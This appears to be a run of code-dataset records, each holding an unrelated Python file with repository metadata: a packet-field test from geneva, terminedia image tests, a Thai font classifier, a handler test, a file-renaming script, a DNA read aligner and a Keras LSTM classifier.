layers.packet.Packet.reset_restrictions()\n layers.packet.SUPPORTED_LAYERS = [\n layers.ip_layer.IPLayer,\n layers.tcp_layer.TCPLayer,\n layers.udp_layer.UDPLayer\n ]\n\n evolve.restrict_headers(logger, \"ip,udp,dns\", \"\", \"version\")\n packet = layers.packet.Packet(pkt)\n proto, field, value = packet.get_random()\n assert proto.__name__ in [\"IP\", \"UDP\"]\n assert len(layers.packet.SUPPORTED_LAYERS) == 2\n assert not layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n assert set(layers.ip_layer.IPLayer.fields) == set([f for f in ipfields if f not in [\"version\"]])\n assert set(layers.udp_layer.UDPLayer.fields) == set(udpfields)\n\n layers.packet.Packet.reset_restrictions()\n for layer in layers.packet.SUPPORTED_LAYERS:\n assert layer.fields, '%s has no fields - reset failed!' % str(layer)\n","repo_name":"Kkevsterrr/geneva","sub_path":"tests/test_packet.py","file_name":"test_packet.py","file_ext":"py","file_size_in_byte":18984,"program_lang":"python","lang":"en","doc_type":"code","stars":1754,"dataset":"github-code","pt":"53"} +{"seq_id":"13409775019","text":"import pytest\nimport terminedia.image as IMG\nimport terminedia as TM\nfrom terminedia.values import DEFAULT_FG, Directions as D\n\n\n# Paletted shape is pending rewrite. 
Data reading from it should yield a characterless pixel\n@pytest.mark.skip\ndef test_palettedshape_new_works():\n\n a = IMG.PalettedShape.new((10, 10))\n a[5, 5] = \"A\"\n assert a.data[10 * 5 + 5] == \"A\"\n assert a.data.count(\" \") == 99\n\n\ndef test_valueshape_new_works():\n a = IMG.ValueShape.new((10, 10))\n a[5, 5] = (255, 255, 255)\n assert a.data[10 * 5 + 5] == (255, 255, 255)\n assert a.data.count((0, 0, 0)) == 99\n\n\ndef test_valueshape_new_works_grey():\n a = IMG.ValueShape.new((10, 10), color=128)\n a[5, 5] = 255\n assert a.data[10 * 5 + 5] == 255\n assert a.data.count(128) == 99\n\n\ndef test_imageshape_new_works():\n a = IMG.ImageShape.new((10, 10), color=(128, 128, 128))\n a[5, 5] = (255, 255, 255)\n assert a.data.getpixel((0, 0)) == (128, 128, 128)\n assert a.data.getpixel((5, 5)) == (255, 255, 255)\n\n\ndef test_shape_context_works():\n a = IMG.PalettedShape(\"...\\n....\")\n assert a.context.color == DEFAULT_FG\n\n\n@pytest.mark.parametrize(\n \"direction, quantity, exp_width, exp_height, exp_data\".split(\", \"),\n [\n (D.RIGHT, 1, 6, 3, [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128]),\n (D.LEFT, 1, 6, 3, [0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0]),\n (D.DOWN, 1, 3, 6, [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128]),\n (D.UP, 1, 3, 6, [0, 0, 0, 0, 0, 0, 0, 0, 128, 255, 0, 0, 0, 0, 0, 0, 0, 0]),\n (\n (1, 1),\n 1,\n 6,\n 6,\n [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128],\n ),\n (\n (-1, -1),\n 1,\n 6,\n 6,\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 0, 0, 0, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n ),\n (\n D.RIGHT,\n 2,\n 9,\n 3,\n [255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 128],\n ),\n ],\n)\ndef test_valueshape_concat(\n direction, quantity, exp_width, exp_height, exp_data, DISPLAY, DELAY\n):\n a = IMG.ValueShape.new((3, 3), color=(0, 0, 0))\n b = IMG.ValueShape.new((3, 3), color=(0, 0, 0))\n\n a[0, 0] = (255, 0, 0)\n b[2, 2] = (128, 128, 255)\n c = a.concat(*((b,) * quantity), direction=direction)\n\n compare_data = [v[0] for v in c.data]\n\n if DISPLAY:\n with TM.Screen(clear_screen=True) as sc:\n sc.draw.blit((0, 0), c)\n sc.context.color = (128, 128, 255)\n sc.print_at(\n (0, 11), f\"quantity={quantity}, width={c.width}, heigth={c.height}\"\n )\n sc.print_at((0, 10), f\"[{compare_data!r}]\")\n TM.pause(DELAY)\n\n assert c.width == exp_width\n assert c.height == exp_height\n assert compare_data == exp_data\n\n\nclass Context:\n def __init__(self, **values):\n self.__dict__.update(values)\n\n\ndef test_create_pixel_bool():\n PXT1 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(True)\n assert px1.get_values(capabilities=PXT1.capabilities) == [True]\n\n\ndef test_create_pixel_from_pixel_bool_and_bool():\n PXT1 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(True)\n px2 = PXT1(px1)\n assert px1 == px2\n assert px2.get_values(capabilities=PXT1.capabilities) == [True]\n\n\n@pytest.mark.parametrize([\"inp\", \"expect\"], [[True, \"#\"], [False, \" \"]])\ndef test_create_pixel_from_pixel_bool_and_str(inp, expect):\n PXT1 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n PXT2 = IMG.pixel_factory(\n value_type=str,\n 
has_foreground=False,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(inp)\n px2 = PXT2(px1, context=Context(char=\"#\"))\n assert px2.get_values(capabilities=PXT2.capabilities) == [expect]\n\n\ndef test_create_pixel_from_pixel_str_bool_pick_color_discard_effect():\n PXT1 = IMG.pixel_factory(\n value_type=str,\n has_foreground=False,\n has_background=False,\n has_effects=True,\n translate_dots=False,\n )\n PXT2 = IMG.pixel_factory(\n value_type=bool,\n has_foreground=True,\n has_background=False,\n has_effects=False,\n translate_dots=False,\n )\n px1 = PXT1(\"#\", TM.Effects.underline)\n px2 = PXT2(px1, context=Context(color=(255, 0, 0)))\n assert px2.get_values(capabilities=PXT2.capabilities) == [True, (255, 0, 0)]\n\n\ndef test_shape_factory_yields_full_shape_on_size_parameter():\n sh = TM.shape((1,1))\n assert sh.__class__ is TM.image.FullShape\n\n\n@pytest.mark.parametrize(\"direct_pixel\", [True, False])\ndef test_fulshape_blit_called_with_pixel_value_on_blit(direct_pixel):\n import terminedia\n import unittest\n from functools import wraps\n orig = terminedia.image.FullShape.__setitem__\n @wraps(orig)\n def new(self, pos, value):\n assert isinstance(value, terminedia.image.Pixel if direct_pixel else (str, bool))\n new.called = True\n return orig(self, pos, value)\n new.called = False\n sh = TM.shape((1,1))\n sh2 = TM.shape((1,1))\n sh2.draw.set((0,0))\n with unittest.mock.patch(\"terminedia.image.FullShape.__setitem__\", new):\n terminedia.image.FullShape.__setitem__ = new\n target = sh.draw if direct_pixel else sh.high.draw\n target.blit((0,0), sh2)\n assert new.called\n\n\n","repo_name":"jsbueno/terminedia","sub_path":"tests/test_images.py","file_name":"test_images.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"163461823","text":"from keras.models import load_model\nimport cv2\nimport numpy as np\nimport os\n\n\nclass ImagePrediction():\n def __init__(self):\n self.alphabet_model = load_model(os.path.dirname(os.path.abspath('__file__'))+r'\\\\model\\\\alphabet_model.h5')\n\n def predict(self,image):\n self.image = image\n self.rois, self.roi_position,self.rois_img= self.get_regions_of_interest(self.image)\n self.predict_imgs = self.preprocessing(self.rois)\n self.predicted_alphabets,self.alphabets_confidence,self.alphabets_img = self.predict_alphabet(self.rois_img,self.roi_position,self.predict_imgs,self.alphabet_model)\n self.predicted_fonts,self.fonts_confidence = self.predict_font(self.predict_imgs,self.predicted_alphabets)\n self.font_result,self.result_confidence = self.get_font_result(self.predicted_fonts)\n \n @staticmethod\n def get_font_result(predicted_fonts):\n counter = 0\n result = predicted_fonts[0]\n for i in predicted_fonts:\n curr_frequency = predicted_fonts.count(i)\n if(curr_frequency> counter):\n counter = curr_frequency\n result = i\n result_confidence = predicted_fonts.count(result)/len(predicted_fonts)\n \n return result,result_confidence\n\n @staticmethod\n def croped2square(roi,increase_ratio=1.2):\n h, w = roi.shape\n r=int(max(h,w)*increase_ratio)\n square = np.zeros((r,r), dtype=np.uint8)\n # background.fill(255) # or img[:] = 255\n # place the image in the center of the background\n offset_x = int((square.shape[1] - w) / 2)\n offset_y = int((square.shape[0] - h) / 2)\n square[offset_y:offset_y+h, offset_x:offset_x+w] = roi\n square = cv2.resize(square, (100,100))\n return square\n\n @staticmethod\n def 
cropfit(img):\n # find the bounding box of the image\n # img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # img = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n #find the first row, first col, last row, last col of white pixels\n x, y, w, h = cv2.boundingRect(img)\n #crop the image\n img = img[y:y+h, x:x+w]\n return img\n\n def preprocessing(self,rois):\n predict_imgs=[]\n for roi in rois:\n img=self.croped2square(self.cropfit(roi))\n img=img.reshape(1,100,100,1)\n predict_imgs.append(img)\n return predict_imgs \n\n @staticmethod\n def get_regions_of_interest(img):\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, 50, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n contours = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n im2 = img.copy()\n rois=[]\n rois_position = []\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(im2, (x, y), (x + w, y + h), (0, 255, 0), 2)\n roi = thresh[y:y + h, x:x + w]\n contours = cv2.findContours(roi, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n max_area = 0\n max_index = 0\n for index,cnt in enumerate(contours):\n area = cv2.contourArea(cnt)\n if area > max_area:\n max_area = area\n max_index = index\n for index,cnt in enumerate(contours):\n if index != max_index:\n x, y, w, h = cv2.boundingRect(cnt)\n roi[y:y + h, x:x + w] = 0\n rois.append(roi)\n rois_position.append((x,y,w,h))\n\n return rois, rois_position ,im2\n \n \n @staticmethod\n def predict_alphabet(image,rois_position,predict_imgs, model):\n predicted_classes=[]\n predictions=[]\n num2alpha = ['uni0E01', 'uni0E02', 'uni0E03', 'uni0E04', \n 'uni0E05', 'uni0E06', 'uni0E07', 'uni0E08', \n 'uni0E09', 'uni0E0A', 'uni0E0B', 'uni0E0C', \n 'uni0E0D', 'uni0E0E', 'uni0E0F', 'uni0E10', \n 'uni0E11', 'uni0E12', 'uni0E13', 'uni0E14', \n 'uni0E15', 'uni0E16', 'uni0E17', 'uni0E18', \n 'uni0E19', 'uni0E1A', 'uni0E1B', 'uni0E1C', \n 'uni0E1D', 'uni0E1E', 'uni0E1F', 'uni0E20', \n 'uni0E21', 'uni0E22', 'uni0E23', 'uni0E24', \n 'uni0E25', 'uni0E26', 'uni0E27', 'uni0E28', \n 'uni0E29', 'uni0E2A', 'uni0E2B', 'uni0E2C', \n 'uni0E2D', 'uni0E2E', 'uni0E2F', 'uni0E30', \n 'uni0E31', 'uni0E32', 'uni0E33', 'uni0E34', \n 'uni0E35', 'uni0E36', 'uni0E37', 'uni0E38', \n 'uni0E39', 'uni0E3A', 'uni0E3F', 'uni0E40', \n 'uni0E41', 'uni0E42', 'uni0E43', 'uni0E44', \n 'uni0E45', 'uni0E46', 'uni0E47', 'uni0E48', \n 'uni0E49', 'uni0E4A', 'uni0E4B', 'uni0E4C', \n 'uni0E4D', 'uni0E4E']\n for c,predict_img in enumerate(predict_imgs):\n # predict\n prediction=model.predict(predict_img)\n # img= cv2.putText(image, num2alpha[c], (rois_position[c][0], rois_position[c][1]),cv2.FONT_HERSHEY_SIMPLEX, 1, color=(0, 0, 255))\n predicted_classes.append(num2alpha[np.argmax(prediction, axis=-1)[0]])\n predictions.append(np.amax(prediction))\n return predicted_classes, predictions ,image\n @staticmethod\n def predict_font(predict_imgs, predicted_alphabets):\n num2font=['AngsanaNew', 'Chonburi', 'iannnnn-DUCK', 'MN KHAIPHALO',\n 'pluempluem', 'pphometowntest', 'THBaijam', 'THCharmofAU',\n 'THFahkwang', 'THKodchasal', 'THKoHo', 'THKrub', 'THMaliGrade6',\n 'THSarabunNew']\n predicted_fonts=[]\n predictions=[]\n for c,predict_img in enumerate(predict_imgs):\n model= load_model(os.path.dirname(os.path.abspath('__file__'))+r'\\\\model\\\\{}.h5'.format(predicted_alphabets[c]))\n prediction=model.predict(predict_img)\n predicted_fonts.append(num2font[np.argmax(prediction, axis=-1)[0]])\n predictions.append(np.amax(prediction))\n return predicted_fonts, 
predictions\n \n \n\n","repo_name":"kaowjubss/ThaiFontDetection","sub_path":"ImagePrediction.py","file_name":"ImagePrediction.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11523119310","text":"import handler\nimport unittest\nimport datetime\n\n\nclass TestHandler(unittest.TestCase):\n def test_arweave_data(self):\n date = datetime.datetime.today() - datetime.timedelta(days=1)\n result = handler.arweave_data('/tx?network=mainnet', date)\n print(result)\n self.assertTrue(result.isdigit())\n\n def test_cgc_global_data(self):\n result = handler.cgc_global_data('total_volume')\n print(result)\n self.assertTrue(result.isdigit())\n\n def test_fetch_data(self):\n data = handler.fetch_data(handler.get_yesterday())\n print(data.to_markdown())\n self.assertIsNotNone(data)\n\n def test_run(self):\n handler.run()\n self.assertTrue(True)\n","repo_name":"yikedu7/daily-mail","sub_path":"handler_test.py","file_name":"handler_test.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9512425052","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/8/14 9:15\n# @Author : runze.wang\n\nimport os\nimport shutil\n\nsource_path = '/home/gdp/data/spine_simulation_2D/masks'\ntarget_path = '/home/gdp/data/spine_simulation_2D/masks_2'\n\nimg_names = os.listdir(os.path.join(source_path))\n\n\nfor img_name in img_names:\n if 'seg' in img_name:\n shutil.copy(os.path.join(source_path, img_name),\n os.path.join(target_path,\n img_name.split('_seg_implant')[0]+\n img_name.split('_seg_implant')[-1].split('.png')[0]+'_implant.png'))\n else:\n shutil.copy(os.path.join(source_path, img_name),\n os.path.join(target_path,\n img_name.split('_implant')[0]+\n img_name.split('_implant')[-1].split('.png')[0]+'_implant.png'))\n # try:\n # shutil.copy(os.path.join(source_path, img_name),\n # os.path.join(target_path,img_name.split('.png')[0]+'_2.png'))\n # except:\n # print('The following file ==>{}<== rename file fail\\r\\n'.\n # format(os.path.join(source_path, img_name)))\n\n\n","repo_name":"runze-wang-sjtu/tools","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74306892649","text":"import sys\nimport numpy as np\nimport math\nimport editdistance\nimport matplotlib.pyplot as plt\n\nverbose = 0\n\n# simple function to load a fasta file\ndef load_fasta(filename):\n genome = ''\n description = ''\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n line = line.rstrip()\n if line[0] == '>':\n description = line[1:]\n else:\n genome += line\n\n return genome, description\n\ndef load_fastq(filename):\n reads = []\n with open(filename) as f:\n done = False\n while not done:\n line = f.readline()\n if line == '':\n done = True\n elif line[0] == '@':\n reads.append(f.readline().rstrip())\n return reads\n\ndef load_readlist(filename):\n reads = []\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n reads.append(line.rstrip())\n return reads\n\ndef reverse_comp(read):\n rcomp = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}\n rread = ''\n for c in read[::-1]:\n rread += rcomp[c]\n return rread\n\ndef bases2vals(bases):\n valdict = {'A':'0', 'C':'1', 'G':'2', 'T':'3'}\n vals = ''\n for base in bases:\n vals += valdict[base]\n return vals\n\n# generates an 
array of size 4^hash_len and each entry contains a list of genome positions matching the hash\ndef generate_hashlist(genome, hash_len):\n hash_list = []\n genome_len = len(genome)\n num_hashs = int(math.pow(4,hash_len))\n\n for i in range(num_hashs):\n hash_list.append([])\n\n genome_position = 0\n while genome_position < (genome_len-hash_len):\n if pos_list and genome_position not in pos_list:\n genome_position += 1\n continue\n index = int(bases2vals(genome[genome_position:genome_position+hash_len]), 4)\n hash_list[index].append(genome_position)\n genome_position += 1\n\n return hash_list\n\ndef map_read(genome, read, hash_list, hash_len):\n # for each genome position in the hash list, compute edit distance for read, return the position & edit distance of the best match\n bestdist = -1\n bestpos = -1\n readlen = len(read)\n hash_index = int(bases2vals(read[:hash_len]), 4) # cool python way to convert a base-4 string to a base-10 integer\n for pos in hash_list[hash_index]:\n dist = editdistance.eval(genome[pos:pos+readlen], read)\n if bestdist == -1 or dist < bestdist:\n bestdist = dist\n bestpos = pos\n\n return bestpos,bestdist\n\ndef qualscore(readlen, num_errors):\n qual_score = -10.0 * math.log10(num_errors/readlen)\n return qual_score\n\ndef scoremin(seq, ref, minlen):\n bestq = 0\n best_q_len = 0\n perfect_len = 0\n\n errors = 0\n ls = len(seq)\n lr = len(ref)\n if lr < ls:\n ls = lr\n\n q = 0\n\n for i in range(minlen):\n if seq[i] != ref[i]:\n errors += 1\n if perfect_len == 0 and errors == 1:\n perfect_len = i\n if errors > 0:\n q = qualscore(minlen, errors)\n bestq = q\n best_q_len = minlen\n else:\n perfect_len = minlen\n\n for i in range(minlen,ls):\n if seq[i] != ref[i]:\n errors += 1\n if errors > 0:\n q = qualscore(i+1, errors)\n else:\n q = 0\n if perfect_len == 0 and errors == 1:\n perfect_len = i\n if q > bestq:\n bestq = q\n best_q_len = i+1\n\n return (bestq,best_q_len,perfect_len)\n\n# set some defaults\nref_name = 'phix174.fasta'\nin_filename = 'phix174.reads'\nout_filename = 'phix174.reads.out'\nhash_len = 4\nscore_cutoff = 0.0\nscore_cutofflen = 0\ndirection_filter = 0\npos_list = None\nwant_plots = False\n\n# parse cmd-line args\nargcc = 1\nargc = len(sys.argv)\nwhile argcc < argc:\n if sys.argv[argcc] == '--ref':\n argcc += 1\n ref_name = sys.argv[argcc]\n if sys.argv[argcc] == '--in':\n argcc += 1\n in_filename = sys.argv[argcc]\n if sys.argv[argcc] == '--out':\n argcc += 1\n out_filename = sys.argv[argcc]\n if sys.argv[argcc] == '--hl':\n argcc += 1\n hash_len = int(sys.argv[argcc])\n if sys.argv[argcc] == '--filter':\n argcc += 1\n score_cutoff = float(sys.argv[argcc])\n argcc += 1\n score_cutofflen = int(sys.argv[argcc])\n if sys.argv[argcc] == '--direction':\n argcc += 1\n direction_filter = int(sys.argv[argcc])\n if sys.argv[argcc] == '--poslist':\n argcc += 1\n pos_list = [int(i) for i in sys.argv[argcc].split(',')]\n if sys.argv[argcc] == '--plots':\n want_plots = True\n if sys.argv[argcc] == '-v':\n verbose += 1\n argcc += 1\n\n# load up our reads\nif in_filename is None:\n print('missing --in readfile?')\n exit(0)\nif '.fastq' in in_filename:\n reads = load_fastq(in_filename)\nelse:\n reads = load_readlist(in_filename)\nprint('loaded %d reads' % len(reads))\n\n# load up the fasta file\nref,description = load_fasta(ref_name)\nif verbose > 0:\n print('loaded ref: %s\\nlength: %d\\n' % (description, len(ref)))\n\nif verbose > 1:\n print('first few reads:')\n for r in range(20):\n print('%s' % reads[r])\n\n# generate hash list from genome and map 
reads\nprint('generating hash list...')\nhash_list = generate_hashlist(ref, hash_len)\nref_r = reverse_comp(ref)\nhash_list_r = generate_hashlist(ref_r, hash_len)\n\nif verbose > 2:\n    print('reference:\\n%s' % ref)\n    print('rcomp ref:\\n%s' % ref_r)\n    print('reference hash list:\\n%s' % str(hash_list))\n    print('rcomp ref hash list:\\n%s' % str(hash_list_r))\n\noutfile = None\nif out_filename:\n    outfile = open(out_filename, 'w') \n\n# stores reads & ref so we can track some mapping stats\ninfo = []\n\nprint('mapping reads...')\nfor i, read in enumerate(reads):\n    rcomp = False\n    # we map to both the forward and the reverse complement of the read, to see which is the best match\n    pos,dist = map_read(ref, read, hash_list, hash_len)\n    pos_r,dist_r = map_read(ref_r, read, hash_list_r, hash_len)\n\n    if pos > -1 or pos_r > -1: # if it mapped\n        if pos > -1 and pos_r > -1: # if it mapped both directions, pick the best one\n            if dist_r < dist:\n                pos = pos_r\n                dist = dist_r # keep the reported edit distance in sync with the chosen orientation\n                rcomp = True\n        elif pos_r > -1: # else if it just mapped to the rcomp, use that one\n            pos = pos_r\n            dist = dist_r\n            rcomp = True\n        # else just stick with the forward read pos & dist\n\n        ref_read = ref_r[pos:pos+len(read)] if rcomp else ref[pos:pos+len(read)]\n        if len(ref_read) == len(read):\n            outtxt = 'read: %s ref: %s rcomp: %s pos: %d dist: %d' % (read, ref_read, rcomp, pos, dist)\n            if outfile:\n                outfile.write('%s\\n' % outtxt)\n            else:\n                print(outtxt)\n            read_name = 'read_' + str(i)\n\n            # store reads & ref so we can calc some stats later\n            info.append((read, ref_read, rcomp, pos, i))\n        else:\n            if verbose > 0:\n                print('failed to align read: %s to valid reference position' % read)\n\nif outfile:\n    outfile.close()\n\nprint('mapped %d out of %d reads' % (len(info), len(reads)))\n\n#####################\n# evaluations\n#####################\n\n# calculate and plot coverage\n# also use this to filter out junk\ninfo_filtered = []\ncov = np.zeros(len(ref))\ncov_filtered = np.zeros(len(ref))\ncov_starts = np.zeros(len(ref))\nnum_forward = 0\nnum_rcomp = 0\nnum_filtered = 0\nfor read in info:\n    score = scoremin(read[0], read[1], score_cutofflen)\n    if score[0] >= score_cutoff:\n        start = read[3]\n        if read[2] is True: # rcomp:\n            start -= len(read[0])\n            num_rcomp += 1\n            direction = -1\n        else:\n            num_forward += 1\n            direction = 1\n\n        if direction_filter == 0 or direction_filter == direction:\n            info_filtered.append(read)\n            cov_filtered[start:start+len(read[0])] += 1\n        cov[start:start+len(read[0])] += 1\n        cov_starts[start] += 1\n\nnum_filtered = len(info_filtered)\nprint('num filtered: %d forward: %d rcomp: %d' % (num_filtered, num_forward, num_rcomp))\n\nif want_plots:\n    plt.figure('coverage')\n    plt.plot(cov)\n\n    plt.figure('starts')\n    plt.plot(cov_starts)\n\n    plt.figure('filtered coverage')\n    plt.plot(cov_filtered)\n\n\nprint('filtered')\n\ncounts= {}\ncounts['A'] = 0\ncounts['C'] = 0\ncounts['G'] = 0\ncounts['T'] = 0\n\navg_scores = 0.0\nfiltered_filename = out_filename + '.filtered'\nwith open(filtered_filename, 'w') as f:\n    for read in info_filtered:\n        bars = ''\n        for i in range(len(read[0])):\n            if read[0][i] == read[1][i]:\n                bars += '|'\n            else:\n                bars += ' '\n                counts[read[0][i]] += 1\n        f.write('@read: %d q-score: %.2f pos: %d rcomp: %s\\n%s\\n%s\\n%s\\n' % (read[4], scoremin(read[0], read[1], 13)[0], read[3], read[2], read[0], bars, read[1]))\n        avg_scores += scoremin(read[0], read[1], 13)[0]\n\navg_scores /= len(info_filtered)\nprint('%d filtered reads with avg q-score at full length: %.2f' % (len(info_filtered), avg_scores))\n\nprint('base counts: A: %d C: %d G: %d T: 
%d\\n' % (counts['A'], counts['C'], counts['G'], counts['T']))\n\nif want_plots:\n plt.show()\n\n","repo_name":"meldavey/bfxtools","sub_path":"align/align_reads.py","file_name":"align_reads.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26033404368","text":"from tensorflow.keras.models import Model\r\nfrom tensorflow.keras.layers import Dropout, Dense, Embedding, LSTM, concatenate\r\nfrom tensorflow.keras import Input\r\nimport matplotlib.pyplot as plt\r\n\r\nimport text_preprocess\r\n\r\n# import os\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\n\r\nname_train, name_test, topics_train, topics_test, files_train, files_test, \\\r\ndes_train, des_test, readme_train, readme_test, label_train, label_test = text_preprocess.return_result()\r\n\r\nname_max_len, topics_max_len, files_max_len, des_max_len, readme_max_len, \\\r\nname_max_features, topics_max_features, files_max_features, \\\r\ndes_max_features, readme_max_features = text_preprocess.return_info()\r\n\r\n# print(len(name_train), name_max_len)\r\n# print(len(topics_train), topics_max_len)\r\n# print(len(des_train), des_max_len)\r\n# print(len(readme_train), readme_max_len)\r\n# print(len(files_train), files_max_len)\r\n#\r\n# wait = input(\"wait\")\r\n\r\nname_input = Input(shape=(name_max_len,), dtype='int32', name='name')\r\ntopics_input = Input(shape=(topics_max_len,), dtype='int32', name='topics')\r\ndes_input = Input(shape=(des_max_len,), dtype='int32', name='des')\r\nreadme_input = Input(shape=(readme_max_len,), dtype='int32', name='readme')\r\nfiles_input = Input(shape=(files_max_len,), dtype='int32', name='files')\r\n\r\nname_embedded = Embedding(50, 32, input_length=name_max_len)(name_input)\r\ntopics_embedded = Embedding(50, 32, input_length=topics_max_len)(topics_input)\r\ndes_embedded = Embedding(500, 32, input_length=des_max_len)(des_input)\r\nreadme_embedded = Embedding(100, 32, input_length=readme_max_len)(readme_input)\r\nfiles_embedded = Embedding(1000, 32, input_length=files_max_len)(files_input)\r\n\r\n# name_vec = Flatten()(name_embedded)\r\n# print(name_vec)\r\n# topics_vec = Flatten()(topics_embedded)\r\n# print(topics_vec)\r\n# des_vec = Flatten()(des_embedded)\r\n# print(des_vec)\r\n# readme_vec = Flatten()(readme_embedded)\r\n# print(readme_vec)\r\n# files_vec = Flatten()(files_embedded)\r\n# print(files_vec)\r\n\r\nname_vec = LSTM(128)(name_embedded)\r\nprint(name_vec)\r\ntopics_vec = LSTM(128)(topics_embedded)\r\nprint(topics_vec)\r\ndes_vec = LSTM(128)(des_embedded)\r\nprint(des_vec)\r\nreadme_vec = LSTM(128)(readme_embedded)\r\nprint(readme_vec)\r\nfiles_vec = LSTM(128)(files_embedded)\r\nprint(files_vec)\r\n\r\nconcatenated = concatenate([name_vec, topics_vec, des_vec, readme_vec, files_vec], axis=-1)\r\n# concatenated = concatenate([topics_vec, des_vec, readme_vec, files_vec], axis=-1)\r\n# print(concatenated)\r\n# wait = input(\"wait\")\r\n\r\n# input_len = 8 * topics_max_len + 16 * des_max_len + 16 * readme_max_len + 16 * files_max_len\r\nout1 = Dense(64, activation='relu')(concatenated)\r\nout1 = Dropout(0.5)(out1)\r\nout2 = Dense(32, activation='relu')(out1)\r\nout3 = Dense(16, activation='relu')(out2)\r\nfinal_out = Dense(1, activation='sigmoid')(out3)\r\n\r\nmodel = Model([name_input, topics_input, des_input, readme_input, files_input], final_out)\r\n# model = Model([topics_input, des_input, readme_input, files_input], final_out)\r\nmodel.compile(optimizer='rmsprop', 
loss='binary_crossentropy', metrics=['acc'])\r\nhistory = model.fit([name_train, topics_train, des_train, readme_train, files_train], label_train, epochs=40,\r\n batch_size=32, validation_split=0.2, shuffle=True)\r\n# history = model.fit([topics_train, des_train, readme_train, files_train], label_train, epochs=10,\r\n# batch_size=32, validation_split=0.2)\r\n\r\nacc = history.history['acc']\r\nval_acc = history.history['val_acc']\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\n\r\nepochs = range(1, len(acc) + 1)\r\n\r\nplt.plot(epochs, acc, 'bo', label='Training acc')\r\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\r\nplt.title('Training and validation accuracy')\r\nplt.legend()\r\n\r\nplt.figure()\r\n\r\nplt.plot(epochs, loss, 'bo', label='Training loss')\r\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\r\nplt.title('Training and validation loss')\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\n# name_model = Sequential()\r\n# name_model.add(Embedding(name_max_features, 32, input_length=name_max_len))\r\n# name_model.add(Flatten())\r\n#\r\n# topics_model = Sequential()\r\n# topics_model.add(Embedding(1000, 128, input_length=topics_max_len))\r\n# topics_model.add(Flatten())\r\n# # topics_model.add(Dense(128, activation='relu'))\r\n# topics_model.add(Dense(1, activation='sigmoid'))\r\n# topics_model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\r\n# topics_model.summary()\r\n#\r\n# history = topics_model.fit(topics_train, label_train, epochs=10, batch_size=32, validation_split=0.2)\r\n\r\n# model = Sequential()\r\n# model.add(Embedding(1000, 128, input_length=topics_max_len))\r\n# model.add(Flatten())\r\n# model.add(LSTM(256))\r\n# model.add(Dense(128, activation='relu'))\r\n# model.add(Dense(1, activation='sigmoid'))\r\n# model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\r\n# model.summary()\r\n# history = model.fit(topics_train, label_train,\r\n# epochs=10,\r\n# batch_size=32,\r\n# validation_split=0.2)\r\n\r\n\r\n#\r\n# history = topics_model.fit(topics_train, label_train, epochs=10, batch_size=32, validation_split=0.2)\r\n#\r\n# des_model = Sequential()\r\n# des_model.add(Embedding(des_max_features, 256, input_length=des_max_len))\r\n# des_model.add(Flatten())\r\n#\r\n# readme_model = Sequential()\r\n# readme_model.add(Embedding(readme_max_features, 512, input_length=readme_max_len))\r\n# readme_model.add(Flatten())\r\n#\r\n# files_model = Sequential()\r\n# files_model.add(Embedding(files_max_features, 512, input_length=files_max_len))\r\n# 